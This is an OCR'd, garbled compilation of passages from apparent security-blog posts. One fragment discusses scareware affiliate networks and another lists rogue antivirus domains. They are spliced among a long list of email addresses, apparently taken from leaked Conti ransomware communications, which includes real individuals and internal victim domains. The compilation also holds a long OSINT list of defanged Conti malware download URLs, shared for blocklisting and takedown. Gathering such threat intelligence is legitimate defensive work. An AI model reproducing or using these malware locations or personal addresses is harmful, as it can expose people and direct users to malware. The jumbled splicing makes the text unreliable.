nernmold@protonmail.com 
nesraben@protonmail.com 
ngetwall@protonmail.com 
ngicksun@protonmail.com 
ngopytom@protonmail.com 
iv4nconsult@yandex.ru 
sinistersio@thesecure.biz 
nisums@protonmail.com 
gikrum@protonmail.com 
koolum@protonmail.com 
nxxx@protonmail.com 
kockman@protonmail.com 
nlogytom@protonmail.com 
nloomtom@protonmail.com 
nlorapop@protonmail.com 
ncrazyb0z@protonmail.com 
tdukeg87@protonmail.com 
tDorothyStewartkaPq@yahoo.com 
tpilligrimm@protonmail.com 
nhalabum@protonmail.com 
nhocktum@protonmail.com 
keeperchic28@aol.com 
daiverjm@exploit.im 
nitro@jabberes.org 
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Has the cloudy economic climate hit [1]the scareware business model, the single most 
efficient and high-liquidity monetization practice that’s driving the majority of blackhat SEO 
and malware attacks? The affiliate networks are either experiencing a slow Q2, or are basically 
experimenting with profit optimization strategies. 


Following the "aggressive" piece of [2]scareware with elements of ransomware discov- 
ered in March, a new version of the [3]rogue security software is once again holding an 
[4]infected system’s assets hostage until a license is purchased. 


This tactic is however a great example of the dynamics of underground ecosystem ([5]The 
Dynamics of the Malware Industry - Proprietary Malware Tools; [6]The Underground Economy’s 
Supply of Goods; [7]76Service - Cybercrime as a Service Going Mainstream; [8]Zeus Crime- 
ware as a Service Going Mainstream; [9]Will Code Malware for Financial Incentives; [10]The 
Cost of Anonymizing a Cybercriminal’s Internet Activities - Part Two; [11]Using Market Forces 
to Disrupt Botnets; [12]E-crime and Socioeconomic Factors; [13]Price Discrimination in the 
Market for Stolen Credit Cards; [14]Are Stolen Credit Card Details Getting Cheaper?). 


Despite the fact that it’s the network of cybercriminals that pays and motivates other 
cybercriminals to SQL inject legitimate sites, send spam, embedd malicious code through 
compromised accounts and launch blackhat SEO campaigns, it cannot exist without the traffic 
that they provide, and is therefore competing with other affiliate networks for it. 
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fuckUSAhahaha@exploit.im 
fuckusa@exploit.im 
nbaron8@ro.ru 
mimiken@protonmail.com 
nminloop@protonmail.com 
alphacrypt@sj.ms 
crazzyygoeshbeverly@protonmail.com 
asvmcodingsup@aol.com 
molakza@protonmail.com 
nmolkens@protonmail.com 
info@omnitrax.com 
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pulyamaster@exploit.im 

taker _@xmpp.jp 
Iwgihlilww@jabberes.org 
maxkl448@protonmail.com 
nmileswinsom@tutanota.com 
nidehack@gmx.de 
nfvaretto@varroclighting.com 
njstevenson@varroclighting.com 
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narspecta@keemail.me 
listun@protonmail.com 
c700@jabber.ru 
nevskiyO@jabbim.pl 
famada@ro.ru 
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dpigeon@exploit.im 
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tAshlineWalt172@yahoo.com 
tShriverHruby76@yahoo.com 
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tHoangCounts31@yahoo.com 
LyAlperl5@yahoo.com 
AshlineWalt172@yahoo.com 
RookerSpicher544@yahoo.com 
KahreAzure133@yahoo.com 
nbenalen@exploit.im 
ololoenko@xmpp.jp 

cash _is_trash@xmpp.jp 
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woldisaev@jabber.ru 
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asd@dfg.ru 

jdoe@gmx.com 
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mike@fuhr.org 

22334 


license@php.net 

edk@ypass.net 

bate@php.net 

fa@php.net 

sebastian@nohn.net 
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schmidt@php.net 
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foo@example.com 
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nobody@kohanaframework.org 
my.domain.com@domain.com 
foo@bar.com 

foo@bar.sub.com 
asd@bar.sub.com 
foo.asd@bar.sub.com 
darwin@snowdale.com 
abdullah@almsaeedstudio.com 
git@github.com 

mail@cebe.cc 
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tobias@diemeisterei.de 
et.coder@gmail.com 
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schmittjoh@gmail.com 
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dave@fontawesome.io 
goschwald@maxmind.com 
john.itvn@gmail.com 
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pabs@pablotron.org 
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simi.albi@outlook.com 
ever.zet@gmail.com 
davert@mail.ua 
davert.php@resend.cc 
davert@codeception.com 
ocramius@gmail.com 
mtdowling@gmail.com 
marius.sarca@gmail.com 
sarca _sorin@hotmail.com 
arne@blankerts.de 
sebastian@phpeople.de 
sebastian@phpunit.de 
opensource@ijaap.nl 
me@mikevanriel.com 
account@ijaap.nl 
marcello.duarte@gmail.com 
sb@sebastian-bergmann.de 
ralph.khattar@gmail.com 
whatthejeff@gmail.com 
github@wallbash.com 
bschussek@2bepublished.at 
mail@kore-nordmann.de 
aharvey@php.net 
bschussek@gmail.com 
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jeanfrancois.simon@sensiolabs.com 
BackEndTea@gmail.com 
ion.bazan@gmail.com 
mark.github@yandex.ru 
admin@example.com 
sfriesen@jenkins.info 
john@jenkins.info 
support@example.com 
noreply@example.com 
nicole.paucek@schultz.info 
tester@example.com 
wrong@email.com 
test2@mail.com 
test@mail.com 
tester.email@example.com 
not-existing-email@example.com 
aaa@bbb.cc 

some _email@example.com 
nicolas.dianna@hotmail.com 
brady.renner@rutherford.com 
woody.gilk@kohanaframework.org 
simon.bolley@gpj.com 
jessicak@chetur.com 
jessicak@chetu.com 
et4rs@chetu.com 
et3rs@chetu.com 
et@chetu.com 
et7rs@chetu.com 
susan.hillyer@sprouselaw.com 
bill.russell@sprouselaw.com 
barons26@yahoo.com 
jorrussell@suddenlink.net 
russell@suddenlinkmail.com 
jorrussell@me.com 


barons26@gmail.com 
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douglas.brooking@sprouselaw.com 
taylor.kelley@sprouselaw.com 
doug.brooking@sprouselaw.com 
matt.sadler@sprouselaw.com 
bert.engeron@wosupply.com 
davidw@dvdempire.com 
GFIME MOVEEXCH _USER@sugarinstant.com 
GFIME MOVEEXCH _USER@tlagay.com 
GFIME _MOVEEXCH _USER@popporn.com 
GFIME MOVEEXCH _USER@digiflixxx.com 
GFIME MOVEEXCH _USER@adultempiredistributing.com 
GFIME MOVEEXCH _USER@pornstarempire.com 
GFIME _MOVEEXCH _USER@ravanallc.com 
GFIME MOVEEXCH USER@empirestore.net 
GFIME _MOVEEXCH _USER@dekkoo.com 
GFIME MOVEEXCH USER@adultempirefilms.com 
GFIME MOVEEXCH USER@empirestores.co 
GFIME MOVEEXCH _USER@adultempirecash.com 
GFIME _MOVEEXCH _USER@whackoffer.com 
GFIME MOVEEXCH USER@useddvdempire.com 
GFIME _MOVEEXCH _USER@blackholeboards.com 
GFIME MOVEEXCH _USER@bedroomadvisor.com 
GFIME MOVEEXCH _USER@bargainadultdvd.com 
GFIME MOVEEXCH _USER@strangespin.com 
GFIME _MOVEEXCH _USER@bluedoor.com 
GFIME _MOVEEXCH _USER@rentals.goodvibes.com 
GFIME MOVEEXCH _USER@vivid.dvdempire.com 
GFIME MOVEEXCH _USER@spicetvstore.com 
GFIME MOVEEXCH _USER@arraydisplays.com 
GFIME _MOVEEXCH _USER@it.dvdempire.com 
GFIME MOVEEXCH USER@empirebase.com 
GFIME _MOVEEXCH _USER@sixflavors.com 
GFIME MOVEEXCH _USER@uencode.net 
GFIME _MOVEEXCH _USER@uencode.com 
GFIME MOVEEXCH _USER@total2257.com 
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GFIME MOVEEXCH USER@2257.com 

GFIME _MOVEEXCH _USER@bluecastvod.com 
GFIME MOVEEXCH _USER@adultempire.com 
GFIME MOVEEXCH _USER@redgalaxy.com 
GFIME MOVEEXCH USER@adultdvdempire.com 
GFIME MOVEEXCH USER@dvdempire.com 
GFIME MOVEEXCH USER@gaydvdempire.com 
GFIME MOVEEXCH USER@useddvd.com 
GFIME MOVEEXCH _USER@stripclubdatabase.com 
GFIME MOVEEXCH _USER@pornstardata.com 
KMartin@snpartners.com 
briancarroll@directmail.com 
tlaci.riley@mgrmedu.com 
trtgroup2@proloads.com 
tjgarcia693@aol.com 

tbill@biomedtechs.com 
toffice@biomedtechs.com 
thealdton.it@stg-healthcare.com 
tje517380@ucf.edu 

tyler@gaudyme.com 
destineeg@DressinGaudy. local 
fowlerh@wilsonart.com 
mharper@waterway.com 
support@nimblestorage.com 
it@henrystreet.org 
amendez@henrystreet.org 
mercedes.dinhamgrant@matchesfashion.com 
mercedesdinham@gmail.com 
werkmodeldn@gmail.com 
simon.r.bolley@gmail.com 

joe@joeware.net 

t.basheer@ise.sa 
satoru.mochida@mizuho-ir.co.jp 
louisa.davies@matchesfashion.com 

azure _join@friver.local 
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11@gmail.com 
12@gmail.com 
45@gmail.com 
15@gmail.com 
48@gmail.com 
53@gmail.com 
19@gmail.com 
29@gmail.com 
24@gmail.com 
5@gmail.com 

14@gmail.com 
52@gmail.com 
44@gmail.com 
32@gmail.com 
36@gmail.com 
49@gmail.com 
43@gmail.com 
38@gmail.com 
22@gmail.com 
23@gmail.com 
51@gmail.com 
40@gmail.com 
9@gmail.com 

20@gmail.com 
1@gmail.com 

7@gmail.com 

33@gmail.com 
21@gmail.com 
6@gmail.com 

26@gmail.com 
46@gmail.com 
13@gmail.com 
3@gmail.com 

54@gmail.com 
47@gmail.com 
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27@gmail.com 

8@gmail.com 

41@gmail.com 
35@gmail.com 
10@gmail.com 
39@gmail.com 
31@gmail.com 
34@gmail.com 

2@gmail.com 

30@gmail.com 
17@gmail.com 

4@gmail.com 

50@gmail.com 
18@gmail.com 
37@gmail.com 
25@gmail.com 

tisha _wattle@geojit.com 
tjasdeep k@geojit.com 
tkarmjeet kaur@geojit.com 
trohit kumar@geojit.com 
tsumit _sharma@geojit.com 
tsunil chhabra@geojit.com 
tjoga _singh@geojit.com 
tkimat _r@geojit.com 

tom _parkash@geojit.com 
tpuneet p@geojit.com 
tshashank jain@geojit.com 
tvishesh k@geojit.com 

Svc _CRMMailSync@vpinc.net 
garya@itc-us.com 
NHNorRAremb@jdisonline.com 
jasons@leadingedgeequip.com 
tomw@itc-us.com 
liebert.monitoring@emerson.com 


richards@continuant.com 
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For your blacklisting, case-building and cross-checking pleasure, currently active black- 
hat SEO and Koobface campaigns monetize the traffic through the following rogue domains: 


yourpcshield .com (209.44.126.14) - AS10929 NETELLIGENT Hosting Services Inc. Email: 
bershkapull@gmail.com 

virustopshield .com 

totalvirushield .com 

pcguardscan .com 
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stevev@egltech.net 
nadministrator@vsphere.local 
nstevev@egltech.net 
nmderfler@microvisionsinc.com 
ithelpdesk@continuant.com 
jeremstew@gmx.com 
blainee@leadingedgeequip.com 
nicd@leadingedgeequip.com 
bwalkerjr@birniebus.com 
ithelp@teng.com 
javier.ramirez@expFederal.com 
administrator@vsphere.local 
mattpeterson@gophersport.com 
benjamin@gentilkiwi.com 
vincent.letoux@gmail.com 
smhanson@lrhc.org 
nShanson@lrhc.org 
shanson@lrhc.org 
michaellee@missme.com 
AndyP@missme.com 
patriciachoi@missme.com 
soohkim@missme.com 
lisakim@missme.com 
ben.mandeville@korbel.com 
thomas@aktn.com 
tkoenig@rtpcompany.com 
gkeller@waterway.com 
waterwaytesting@gmail.com 
transact@waterway.com 
nbod0O1.svc.vcenter@eu.Wilsonart.com 
nfowlerh@wilsonart.com 
michaelpusatera@gmail.com 
amybrinkman13@gmail.com 
morganpusatera@icloud.com 
mpusatera@sotelsystems.com 
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map@waterway.com 
hd@waterway.com 
customercare@waterway.com 
waterwayapps@gmail.com 
blauer@waterway.com 
jboden@waterway.com 
CustomerService@waterway.com 
ntcooley@evo.local 
djarden@waterway.com 
supertest@mail.test 
nmpusatera@waterway.com 
nztclmgplmwfqmcjqfn@waqcefp.com 
nj.shoemaker@australiamail.com 
markharper.pwlonghorns@gmail.com 
markharper@markharper.net 
tweiskopf@waterway.com 
mpusatera@waterway.com 
ztclmgpImwfqmcjqfn@waqcefp.com 
ribom53736@vy89.com 
nmichaelpusatera@gmail.com 
djarden@waterwary.com 
ndjarden@waterway.com 
VMPro@gaudyme.com 
Administrator@gaudyme.com 
Administrator@dressingaudy.local 
POS14@DressinGaudy.local 
POS16@DressinGaudy.local 
pos15@DressinGaudy.local 
GCPOS4A-LGM2@DressinGaudy.local 
tim@gaudyme.com 
tim@dressingaudy.local 
GCPOS11A-CDG1@DressinGaudy.local 
GCPOS10A-TGM3@DressinGaudy.local 
GCPOS18A-LDG2@DressinGaudy.local 
GCPOS9A-TGM2@DressinGaudy.local 
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DG108@DressinGaudy. local 
GCPOS2A-TDG2@DressinGaudy.local 
GCPOS12A-CDG2@DressinGaudy. local 
longview@gaudyme.com 
longview@dressingaudy.local 
GM106@DressinGaudy.local 
DG102@DressinGaudy. local 
GCPOS13A-CDG3@DressinGaudy. local 
accounting@gaudyme.com 
david@gaudyme.com 
jeni@gaudyme.com 
jeni@dressingaudy.local 
jmr@DressinGaudy.local 
GCPOS6A-TXDG1@DressinGaudy. local 
GCPOS1A-TDG1@DressinGaudy.local 
canton@dressingaudy.local 
canton@gaudyme.com 
ROOK@DressinGaudy. local 
brianna@gaudyme.com 
brianna@dressingaudy.local 
bdc@DressinGaudy.local 
GCPOS17A-LDG1@DressinGaudy.local 
GCPOS3A-LGM1@DressinGaudy. local 
DG105@DressinGaudy. local 
GCPOS5A-LGM3@DressinGaudy. local 
Breer@gaudyme.com 
Breer@dressingaudy.local 
GCPOS7A-TXDG2@DressinGaudy. local 
corporate@dressingaudy. local 
corporate@gaudyme.com 
GM103@DressinGaudy.local 
GCPOS8A-TGM1@DressinGaudy.local 
FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fale042@gaudyme.com 
FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fale042@dressingaudy.local 
debbie@gaudyme.com 
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debbie@dressingaudy. local 
dat@DressinGaudy.local 
dg@gaudyme.com 
dg@dressingaudy.local 
holly@gaudyme.com 
holly@dressingaudy.local 
hbt@DressinGaudy.local 
johnie@gaudyme.com 
johnie@dressingaudy.local 
jou@DressinGaudy.local 
kyli@gaudyme.com 
kyli@dressingaudy.local 
klm@DressinGaudy.local 
mika@gaudyme.com 
mika@dressingaudy.local 
emm@DressinGaudy. local 
naia@gaudyme.com 
naia@dressingaudy.local 
ncp@DressinGaudy.local 
texarkana@gaudyme.com 
texarkana@dressingaudy.local 
tyler@dressingaudy. local 
Info@dressingaudy.local 
Info@gaudyme.com 
canon@DressinGaudy.local 
Receiving2@dressingaudy.local 
Receiving2@gaudyme.com 
receiving@dressingaudy.local 
receiving@gaudyme.com 
receiving1@DressinGaudy.local 
sharies@gaudyme.com 
sharis@gaudyme.com 
sharies@dressingaudy.local 
sharis@dressingaudy.local 
Label@DressinGaudy. local 
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allisonp@DressinGaudy.local 
allisonp@gaudyme.com 
social3@gaudyme.com 
katies@gaudyme.com 
social3@dressingaudy.local 
MeaganC@DressinGaudy.local 
meaganc@gaudyme.com 
CustomerService@gaudyme.com 
customerservice@shopthegaudy.com 
CustomerService@dressingaudy. local 
sales@gaudyme.com 
sales@shopthegaudy.com 
sales@dressingaudy.local 
Social@dressingaudy.local 


Social@gaudyme.com 


Shopthegaudysite.orders@shopthegaudy.com 


Shopthegaudysite@dressingaudy.local 
order@dressingaudy.local 
order@gaudyme.com 
admin@shopthegaudy.com 
admin@dressingaudy.local 
Careers@shopthegaudy.com 
Careers@dressingaudy. local 
orders@gaudyme.com 
orders@shopthegaudy.com 
orders@dressingaudy.local 
DGLongview@dressingaudy.local 
DGLongview@gaudyme.com 
LeahP@dressingaudy. local 
LeahP@gaudyme.com 
madisonc@dressingaudy.local 
madisonc@gaudyme.com 
sabrinah@DressinGaudy. local 
sabrinah@gaudyme.com 


scanning@dressingaudy.local 
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scanning@gaudyme.com 
kaylab@dressingaudy.local 
kaylab@gaudyme.com 
gaudy@gaudyme.com 
Gaudy@shopthegaudy.com 

gaudy @dressingaudy.local 
socialmedia2@DressinGaudy.local 
website@DressinGaudy.local 
socialmedial@DressinGaudy.local 
VMPro@dressingaudy.local 
grantp@DressinGaudy.local 
Katelync@DressinGaudy.local 
Rockwall@DressinGaudy.local 
clittleton@DressinGaudy.local 
socialmedia3@DressinGaudy.local 
MackenziD@DressinGaudy.local 
cooperm@DressinGaudy. local 
magen|I@DressinGaudy.local 
larkino@DressinGaudy.local 
kimw@DressinGaudy.local 
teresac@DressinGaudy.local 
cindyh@DressinGaudy.local 
megan|I@DressinGaudy.local 
k1945880@kingston.ac.uk 
nAdministrator@main.crispregional.org 
londonit@ballymoregroup.com 
emailme@italymail.com 
rlawrence@amgusSa.org 
rlawrence@barfieldinc.com 
nrlawrence@amgusa.org 
stopstorage@qq.com 
logan@overland.com 
azureadadmin@overlandsheepskin.onmicrosoft.com 
todd@overland.com 


ntodd@mail.overland.com 
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eventuser01@ad.snu.edu 

IWAM _GSCCORP@televisa.com.mx 
ntyler.terzigni@grantweber.com 
robert.nye@grantweber.com 
arsahgg314@yandex.com 
lev.menche.dochilov@list.ru 
maks.korelov.87@bk.ru 
vesta.verenikina.90@mail.ru 
tguerillamailaccount@sharklasers.com 
cOntiteam41@protonmail.com 
laposberrrg@outlook.com 
laurent.gaffie@gmail.com 
ranthank@mail.ru 
bqhost@exploit.im 
dr.hash@exploit.im 
n3700@jabb.im 
willow381561@gmail.com 
zlindauspod@inbox.|v 
no@name.com 
jameswatson@xmpp.jp 
monkeymadness@thesecure.biz 
taylor@laravel.com 
info@advertiseyourchannel.com 
hello@example.com 
andrew@ingenerator.com 
Sam@enov.ws 
guillaumepoiriermorency@gmail.com 
aes128-gcm@openssh.com 
aes256-gcm@openssh.com 
chacha20-poly1305@openssh.com 
followme@default.rs 
loguntsov@gmail.com 


Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEjV_FkYBe5M1sHU1Dnt T35HTrJKmyA105LKgU1b4rDDBbe0o 
AnLucSnEd0iweNtL6bTASvKWh- eE1UURC1qcUPsbj9k3kt7UcpbZGs 
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18.6.9 A Compilation of Known Conti Ransomware Gang Malicious Executable Down- 
load Locations - An OSINT Analysis (2022-06-21 07:04) 


[1] 


Host distribution by ISP 


| 


I’ve decided to continue data mining the recently leaked Conti Ransomware Gang internal 
communications on my way to find and share more actionable intelligence in terms of their 
Internet-connected infrastructure and in this post I’ve decided to share a set of currently 
active malicious executable download locations courtesy of the Conti Ransomware gang 
which you can check out in terms of attribution and cyber attack campaign take down efforts. 


Sample list of currently active Conti Ransomware gang malicious executable download 
locations: 


hxxp://copyrightlive-ksa.com/Preview _Report.exe 


hxxp://ebeautytrade.com/calc.exe 
hxxp://37.1.209.181/2805/locker.exe 
hxxp://omegasystemsuae.com/Preview _Document.exe 
hxxp://copyrightlive-ksa.com/Preview _Document.exe 
hxxp://www.alkanzalzahabi.com/Preview _Document.exe 
hxxp://omegasystemsuae.com/Preview _Document.exe 
hxxp://shawigroup.com/Preview _Document.exe 
hxxp://copyrightlive-ksa.com/Preview _Document.exe 
hxxp://www.alkanzalzahabi.com/Preview _Document.exe 
hxxp://shawigroup.com/Preview _Document.exe 
hxxp://copyrightlive-ksa.com/P32.exe 
hxxp://shawigroup.com/Preview _Document.exe 
hxxp://allacestech.com/Preview _Document.exe 
hxxp://allacestech.com/Preview _Document.exe 
hxxp://shawigroup.com/Preview _Document.exe 
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hxxp://allacestech.com/Preview _Document.exe 
hxxp://allacestech.com/Preview _Document.exe 
hxxp://allacestech.com/Preview _Document.exe 
hxxp://globaluxrma.com/Preview _Document.exe 
hxxp://globaluxrma.com/Preview _Document.exe 
hxxp://shighil.com/Preview _Document.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://www.bsrdesigns.com/DocumentPreview.exe 
hxxp://91.235.129.41/P32.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://watchespower.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://watchespower.com/DocumentPreview.exe 
hxxp://www.bsrdesigns.com/DocumentPreview.exe 
hxxp://watchespower.com/DocumentPreview.exe 
hxxp://91.235.129.41/P32.exe 
hxxp://91.235.129.41/P32.exe 
hxxp://alexandersqualitycleaners.com/DocumentPreview.exe 
hxxp://middletownfriedchickengyro.com/DocumentPreview.exe 
hxxp://91.235.129.41/P32.exe 
hxxp://dubaidreamsadventure.com/Document _Aerlingus.exe 
hxxp://www.shiningshadowllc.com/Document _BritishAirways.exe 
hxxp://dubaidreamsadventure.com/Document _Aerlingus.exe 
hxxp://www.shiningshadowllc.com/Document _BritishAirways.exe 
hxxp://dubaidreamsadventure.com/Document _Aerlingus.exe 
hxxp://www.shiningshadowllc.com/Document _BritishAirways.exe 
hxxp://www.shiningshadowllc.com/Document _BritishAirways.exe 
hxxp://www.omegasystemsuae.com/Document _Aerlingus.exe 
hxxp://www.omegasystemsuae.com/Document _Aerlingus.exe 
hxxp://www.omegasystemsuae.com/Document _Aerlingus.exe 
hxxp://www.omegasystemsuae.com/RalphLaurenDocument.exe 
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hxxp://copyrightlive-uae.com/calc.exe 
hxxp://copyrightlive-uae.com/Id1in.exe 
hxxp://copyrightlive-uae.com/DAFSDASD.exe 
hxxp://copyrightlive-uae.com/DocumentPreview.exe 
hxxp://www.almakaan.com/DocumentPreview.exe 
hxxp://copyrightlive-uae.com/DocumentPreview.exe 
hxxp://45.153.240.191/crypt/18554hs.exe 
hxxp://copyrightlive-uae.com/DocumentPreview.exe 
hxxp://copyrightlive-uae.com/PreviewDocument.exe 
hxxp://194.5.249.13/p32.exe 
hxxp://globaluxrma.com/ReviewDocument.exe 
hxxp://shawigroup.com/ReviewDocument.exe 
hxxp://bloomfieldholding.com/ReviewDocument.exe 
hxxp://bloomfieldholding.com/wp-content/ReviewDocument.exe 
hxxp://greenmountains.ae/YAS42.exe 
hxxp://greenmountains.ae/YAS42.exehxxp://copyrightlive-ksa.com/Preview _Report.exe 
hxxp://www.alkanzalzahabi.com/DocumentPreview.exe 
hxxp://copyrightlive-ksa.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://allacestech.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://alwasl-syria.com/DocumentPreview.exe 
hxxp://alwasl-syria.com/DocumentPreview.exe 
hxxp://nutritionprofbob.com/DocumentPreview.exe 
hxxp://violinstop.com/DocumentPreview.exe 
hxxp://alwasl-syria.com/DocumentPreview.exe 
hxxp://alwasl-syria.com/DocumentPreview.exe 
hxxp://alwasl-syria.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://allacestech.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 


hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
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topwinsystemscan .com 
basevirusscan .com 
systemvirusscan .com 
bastvirusscan .com 
myfirstsecurityscan .com 
fastviruscleaner .com 
allvirusscannow .com 


freeforscanpc .com (209.44.126.241) - AS10929 NETELLIGENT Hosting Services Inc. 
truevirusshield .com 
totalvirusshield .com 
hypersecurityshield .com 
scanyourpconline .com 
allowedwebsurfing .com 
xvirusdescan .com 
securitytrustscan .com 
fullsecurityaction .com 
fullvirusprotection .com 
fullsecuritydefender .com 
hupersecuritydot .com 
trustedwebsecurity .com 
greatscansecurity .com 
updateyoursecurity .com 
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hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/Setup.exe 
hxxp://www.omegasystemsuae.com/Setup.exe 
hxxp://www.omegasystemsuae.com/Setup.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://bloomfieldholding.com/DocumentPreview.exe 
hxxp://bloomfieldholding.com/PreviewDocument.exe 
hxxp://shawigroup.com/DuplicateFinder.exe 
hxxp://shawigroup.com/DuplicateFinder.exe 
hxxp://shawigroup.com/DuplicateFinder.exe 


hxxp://shawigroup.com/Doc-Print.exe 


hxxp://middletownfriedchickengyro.com/DocumentPreview.exe 


hxxp://middletownfriedchickengyro.com/Doc-Print.exe 


hxxp://middletownfriedchickengyro.com/DocumentPreview.exe 


hxxp://middletownfriedchickengyro.com/Doc-Print.exe 
hxxp://nutritionprofbob.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocPreview.exe 
hxxp://porceletta-ware.com/DocPreview.exe 
hxxp://violinstop.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocPreview.exe 
hxxp://www.ottenbourg.com/Doc-Preview.exe 
hxxp://violinstop.com/DocumentPreview.exe 
hxxp://violinstop.com/DocumentPreview.exe 
hxxp://nutritionprofoob.com/DocumentPreview.exe 
hxxp://www.shiningshadowllc.com/Doc-Preview.exe 
hxxp://shighil.com/Doc-Preview.exe 


hxxp://violinstop.com/DocumentPreview.exe 
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hxxp://gk24w3eumyv4fqajpbw6jbrd6eb4kwvcqcfg4po25cnxuqs7hhhan6yd.onion/ npcap.exe 
hxxp://www.ottenbourg.com/AcademiPreview.exe 
hxxp://www.shiningshadowllc.com/Doc-Preview.exe 
hxxp://ajeetsinghbaddan.com/Doc-Preview.exe 
hxxp://www.shiningshadowllc.com/Doc-Preview.exe 
hxxp://ajeetsinghbaddan.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Doc-Preview.exe 
hxxp://reefglobal.com/Docl.exe 
hxxp://reefglobal.com/dl2a.exe 
hxxp://paullesueurlegacyfoundation.com/9rhjdkjfh.exe 
hxxp://www.ottenbourg.com/nagpsdo.exe 
hxxp://www.namaskardunia.com/badtest2.exe 
hxxp://www.namaskardunia.com/testl.exe 
hxxp://45.148.120.192/service64.exe 
hxxp://45.148.120.192/servicel11.exe 
hxxp://45.148.120.192/service222.exe 
hxxp://fdsfdsf.com/fdsfds/file.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://45.148.120.192/service64.exe 
hxxp://45.148.120.192/service111.exe 
hxxp://45.148.120.192/service222.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 


hxxp://www.ottenbourg.com/upload/xml1.exe 
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hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://www.ottenbourg.com/upload/xml1.exe 
hxxp://dylanengineeringservices.com/3.exe 
hxxp://dylanengineeringservices.com/3.exe 
hxxp://www.ottenbourg.com/5.exe 
hxxp://maintenance.com/autoupdate.exe 
hxxp://85.25.194.150/BVY729LK1OPAWN/1.exe 
hxxp://85.25.194.150/BVY729LK1OPAWN/2.exe 
hxxp://85.25.194.150/BVY729LK1OPAWN/3.exe 
hxxp://85.25.194.150/BVY729LK1OPAWN/1.exe 
hxxp://85.25.194.150/BVY729LK1OPAWN/2.exe 
hxxp://85.25.194.150/BVY729LK1OPAWN/3.exe 
hxxp://shighil.com/dl2.exe 
hxxp://shighil.com/dl2.exe 
hxxp://62.108.34.54/service64.exe 
hxxp://62.108.34.54/service _ssl.exe 
hxxp://62.108.34.54/P32.exe 
hxxp://62.108.34.54/winserv.exe 
hxxp://62.108.34.54/service64.exe 
hxxp://62.108.34.54/service _ssl.exe 
hxxp://62.108.34.54/P32.exe 
hxxp://62.108.34.54/winserv.exe 
hxxp://62.108.34.54/service64.exe 
hxxp://62.108.34.54/service _ssl.exe 
hxxp://62.108.34.54/P32.exe 
hxxp://62.108.34.54/winserv.exe 
hxxp://62.108.34.54/service64.exe 
hxxp://62.108.34.54/service _ssl.exe 


22355 


hxxp://62.108.34.54/P32.exe 
hxxp://62.108.34.54/winserv.exe 
hxxp://emploimed.com/dl2m.exe 
hxxp://copyrightlive-ksa.com/t1000.exe 
hxxp://www.shighil.com/dl2.exe 
hxxp://www.shighil.com/dl2.exe 
hxxp://nutritionprofbob.com/teste.exe 
hxxp://copyrightlive-ksa.com/t1000.exe 
hxxp://www.shiningshadowllc.com/DocumentPreview.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/1.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/2.exe 
hxxp://85.25.194.150/BVY729LK10PAWN/3.exe 
hxxp://brankovucinec.blob.core.windows.net/downloads/mstsc.exe _.manifest.zip 
hxxp://emploimed.com/scintillabc.exe 
hxxp://emploimed.com/scintillabc.exe 
hxxp://www.coalminds.com/Document _Print.exe 
hxxp://www.sonorambc.org/Document _Print.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://nutritionprofbob.com/Previewl.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://nutritionprofbob.com/Preview1.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://nutritionprofbob.com/Preview1.exe 
hxxp://nutritionprofbob.com/Preview.exe 
hxxp://nutritionprofbob.com/Preview1.exe 
